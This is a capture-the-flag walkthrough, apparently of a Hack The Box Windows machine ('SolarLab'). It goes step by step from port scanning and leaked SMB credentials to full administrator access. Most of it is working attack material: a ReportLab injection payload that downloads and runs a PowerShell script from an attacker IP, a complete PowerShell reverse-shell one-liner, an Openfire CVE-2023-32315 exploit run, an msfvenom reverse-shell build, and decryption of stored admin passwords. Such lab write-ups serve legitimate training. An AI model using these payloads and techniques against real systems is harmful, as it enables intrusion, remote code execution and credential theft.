TCP Scan

> TARGET=10.129.61.108 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT     STATE SERVICE       REASON          VERSION
80/tcp   open  http          syn-ack ttl 127 nginx 1.24.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://solarlab.htb/
|_http-server-header: nginx/1.24.0
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
6791/tcp open  http          syn-ack ttl 127 nginx 1.24.0
|_http-server-header: nginx/1.24.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  • add host entries for both vhosts
echo '10.129.61.108    solarlab.htb    report.solarlab.htb' >> /etc/hosts

enum

  • enum4linux
> enum4linux solarlab.htb
[x]
  • subdomain
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://solarlab.htb/" -H "Host: FUZZ.solarlab.htb" --hl 107
* /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
  • dirsearch
dirsearch -u http://solarlab.htb/
[17:22:14] 403 -  555B  - /assets/
[17:22:14] 301 -  169B  - /assets  ->  http://solarlab.htb/assets/
[17:22:42] 301 -  169B  - /images  ->  http://solarlab.htb/images/
[17:22:42] 403 -  555B  - /images/
  • smb
smbclient -N -L \\solarlab.htb
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Documents       Disk
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

smbclient -N //solarlab.htb/Documents
  • credentials found in details-file.xlsx on the Documents share
Alexander.knight@gmail.com	  al;ksdhfewoiuh
KAlexander	                  dkjafblkjadsfgl
Alexander.knight@gmail.com	  d398sadsknr390
blake.byte	                  ThisCanB3typedeasily1@
AlexanderK	                  danenacia9234n
ClaudiaS	                  dadsfawe9dafkn

report.solarlab.htb:6791

  • some guesswork is needed to log in with the passwords above (the usernames in the sheet do not match the login form exactly); the working pair is blakeb:ThisCanB3typedeasily1@
hydra -C creds.txt report.solarlab.htb -s 6791 http-post-form "/login:username=^USER^&password=^PASS^:F=not"
[x]
  • generate a leave request at http://report.solarlab.htb:6791/leaveRequest and inspect the resulting PDF
> strings output.pdf
% ReportLab generated PDF document -- digest (http://www.reportlab.com)
<para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell.exe IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.88/shell.ps1")') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">exploit</font></para>
  • travelApprovalForm can be used for RCE: the PDF is built by ReportLab, whose paragraph markup parser evaluates the expression placed in the font color attribute, so user-supplied form text reaches that parser and the payload above runs on the server; use it to set up a reverse shell
$client = New-Object System.Net.Sockets.TCPClient("ip",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  • request payload
<para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell.exe IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.88/shell.ps1\')') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">exploit</font></para>
  • get user flag
PS C:\Users\blake\desktop> type user.txt
f97f5b91b4a9b1a368805946dc7c36ac

root

  • found a db file
PS C:\users\blake\documents\app\reports\instance> ls


    Directory: C:\users\blake\documents\app\reports\instance


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/17/2023  12:11 PM          12288 users.db
  • the file is small, so base64-encode it for transfer
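# Base64-encode users.db so the SQLite file can be copied out as plain text.
# [IO.File]::ReadAllBytes works in both Windows PowerShell 5.1 and PowerShell 7;
# Get-Content -Encoding Byte exists only in 5.1 (PowerShell 7 replaced it with
# -AsByteStream), so the original form fails on newer hosts.
# Resolve-Path is required because .NET's working directory can differ from the
# PowerShell location, and ReadAllBytes resolves relative paths against .NET's.
$dbPath = (Resolve-Path -LiteralPath 'users.db').ProviderPath
$bytes = [IO.File]::ReadAllBytes($dbPath)
$base64 = [Convert]::ToBase64String($bytes)
# Set-Content writes the string followed by a newline, same as the original.
Set-Content -LiteralPath 'output.txt' -Value $base64
Get-Content -LiteralPath 'output.txt'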
  • the user table stores passwords in cleartext; the useful one is alexanderk:HotP!fireguard
sqlite> select * from user;
1|BlakeB|BlakeB
2|ClaudiaS|ClaudiaS
3|AlexanderK|ClaudiaS
4|blakeb|ThisCanB3typedeasily1@
5|claudias|007poiuytrewq
6|alexanderk|HotP!fireguard
  • an Openfire instance is listening on 9090 (PID 2988), bound to 127.0.0.1 only, so it is reachable only through a pivot
> netstat -ano
Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       5976
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       364
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:6791           0.0.0.0:0              LISTENING       5976
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       532
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       316
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1544
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       652
  TCP    10.129.61.108:139      0.0.0.0:0              LISTENING       4
  TCP    10.129.61.108:55186    10.10.14.88:4444       ESTABLISHED     5324
  TCP    127.0.0.1:5000         0.0.0.0:0              LISTENING       5924
  TCP    127.0.0.1:5222         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5223         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5262         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5263         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5269         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5270         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5275         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5276         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:7070         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:7443         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:9090         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:9091         0.0.0.0:0              LISTENING       2988
  • prepare chisel for pivoting
PS C:\users\blake\desktop> curl http://10.10.14.88/chisel.exe -o chisel.exe


# On Kali
> chisel server -p 9999 --reverse
# update /etc/proxychains.conf
# comment out `proxy_dns` for nmap to work
socks5 127.0.0.1 <sock-port>

# On Pivot
# for specific port forwarding
.\chisel client --max-retry-count=1 10.10.14.88:9999 R:9090:localhost:9090
> python3 CVE-2023-32315.py -t http://localhost:9090
Successfully retrieved JSESSIONID: node01bx31xpd0ogwb1hk51dnprk3is2.node0 + csrf: CO5C3JDciafMtKn
User added successfully: url: http://localhost:9090 username: nnf2la password: 0eojze
  • follow the instructions in the README to upload a plugin for RCE
  • create a reverse shell executable and upload it to c:\users\public\
> msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.88 LPORT=5555 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

# call the shell on the plugin page
> c:\users\public\shell.exe

> rlwrap nc -vnlp 5555
listening on [any] 5555 ...
connect to [10.10.14.88] from (UNKNOWN) [10.129.61.108] 55285
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\Openfire\bin>whoami
whoami
solarlab\openfire
  • find the embedded-db directory under the Openfire install; openfire.script there holds the admin user's encrypted password next to the passwordKey property used to decrypt it
> C:\Program Files\Openfire\embedded-db>type openfire.script
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
...
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
> java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)
  • admin password: ThisPasswordShouldDo!@
> $SecPassword = ConvertTo-SecureString 'ThisPasswordShouldDo!@' -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPassword)
> $session = New-PSSession -Credential $Cred
> Invoke-Command -Session $session -scriptblock { type c:\users\administrator\desktop\root.txt }

3d5d56bc9bdffdf24e85212c1387503d
